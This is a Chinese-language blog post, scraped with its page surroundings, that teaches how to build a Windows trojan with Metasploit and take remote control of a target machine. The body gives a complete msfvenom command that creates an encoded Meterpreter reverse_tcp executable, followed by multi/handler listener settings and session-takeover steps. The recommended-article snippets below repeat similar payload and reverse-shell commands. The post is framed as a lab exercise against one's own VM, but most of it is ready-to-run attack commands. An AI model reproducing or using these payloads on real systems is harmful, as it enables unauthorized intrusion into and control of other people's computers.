MSF制作木马远程控制windows机器

最新推荐文章于 2024-04-24 09:45:11 发布
最新推荐文章于 2024-04-24 09:45:11 发布
阅读量551 收藏 5
点赞数 13
文章标签: windows web安全 安全 服务器 网络 tcp/ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65633498/article/details/137651481
版权

  • 准备工作

用于制作木马文件的kali Linux操作系统以及一台被控靶机(这里我用的是win10虚拟机,没有的同学可以在本地物理机进行操作,注:除了自己安装的杀软需要关闭,Windows安全中心也需要进行关闭)

Kali IP(192.168.......)

靶机 IP(192.168.......)

  • 制作木马

Pyload:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=《kali的IP》 LPORT=《指定任意未被占用的端口号》 -b "\x00" -i 10 -f exe -o /var/www/html/shell.exe(/var/www/html —>指所制作木马文件存储于该路径之下)

注:这里需要kali root用户进行完成,否则可能会报错。

Pyload相关参数含义

  • 将木马拖出放置到桌面

  • 利用msf进行攻击

Msfconsole(启动MSF)

use exploit/multi/handler  //开启监听

set payload windows/meterpreter/reverse_tcp  //设置payload,选择漏洞利用模块

set lhost 192.168.200.130  //本地IP,即攻击IP

set lport 8088  //监听端口

show options //查看设置参数

进入靶机双击运行木马,然后进行攻击。

exploit   //攻击

  • 查看上钩用户

sessions(查看上钩的用户)

sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

当出现meterpreter 时表明我们已经入侵成功

入侵成功之后,我们就可以进行后续攻击行为啦!

月印千江671
关注
  • 13
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
服务器部署msf生成windows木马远程攻击个人主机
CC__Faker的博客
07-01 1806
目录0x01 环境部署0x01 纯净系统安装0x02 安装msf0x02 生成木马0x03 利用msf攻击 0x01 环境部署 我云服务器采用的是阿里云的服务器,自己重装了个纯净系统,建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用阿里云服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 0x01 纯净系统安装 1)安装软件 #Debian/Ubuntu系统: apt-get update apt-get install -y xz-utils openssl gawk fil
实战-使用msf渗透攻击win7主机并远程执行命令
保持微笑的博客
01-14 2319
1.什么是永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.通过msf模块获取win7主机远程shell 模块的整体使用流程如下
Msfvenom生成木马实验
m0_74025111的博客
04-24 726
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
利用msfvenom制作windows木马及免杀马
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6588
生成木马进行植入
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4171
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
71-71.渗透测试-Windows安装msf.mp4
最新发布
05-10
71-71.渗透测试-Windows安装msf.mp4
第九十七课:msf配置自定义payload控制目标主机权限1
08-03
攻击机配置如下:Name Current Setting Required DescriptionRHOST 192.168.1.119 yes The tar
msf-haskell:Haskell Metasploit远程API的实现
05-31
无国界医生哈斯克尔 介绍 该目录包含 Haskell Metasploit 绑定和库,以及描述该库目的和使用的。 简而言之, 是一个广泛部署的开源渗透测试平台。... 截至 2013 年初,此绑定与 MSF API 兼容,但尚未在更新
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 3456
msfconsole制作windows木马并上线获取控制权限
Metasploit(msf)木马生成
m0_58713554的博客
11-04 298
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击ip LPORT=1234 -f exe > /root/新建文件的文件名.exe 2 ls 查看是否创建出了该文件 3 然后进入msfconsole进行监听 4 use exploit/multi/handler 进入监听模式 5 set PAYLOAD set LHOST攻击ip set LPORT 配置参数 6 run 运行 7 把刚...
MSF生成一个木马与使用
lx1315998513的博客
03-27 1万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。 准备: 目标:win7 x64专业版 攻击主机:Kali IP:192.168.1.143 生成: 生成test.exe木马文件 Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1...
网络安全MSF生成木马教程
一直被模仿,从未被超越
03-13 1168
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf生成简单木马
qq_44881113的博客
09-04 307
windows 木马 msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe 监听 msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_http s
利用msf生成木马拿下主机shell
mulincong的博客
05-25 561
利用msf生成木马拿下主机shell 关于拿下shell的后渗透我会逐渐出文章,请关注
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 1447
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
如何使用kali的msf制作木马
06-10
我很抱歉,我不能回答如何使用Kali的Metasploit Framework(MSF制作木马的问题,因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具,但其目的是帮助安全专业人员和网络管理员保护网络安全,而不是破坏网络安全。在任何情况下,不要试图使用Kali或任何其他工具来制作或传播恶意软件,否则你可能会面临法律责任。请遵守相关法规和道德规范,使用工具来促进网络安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值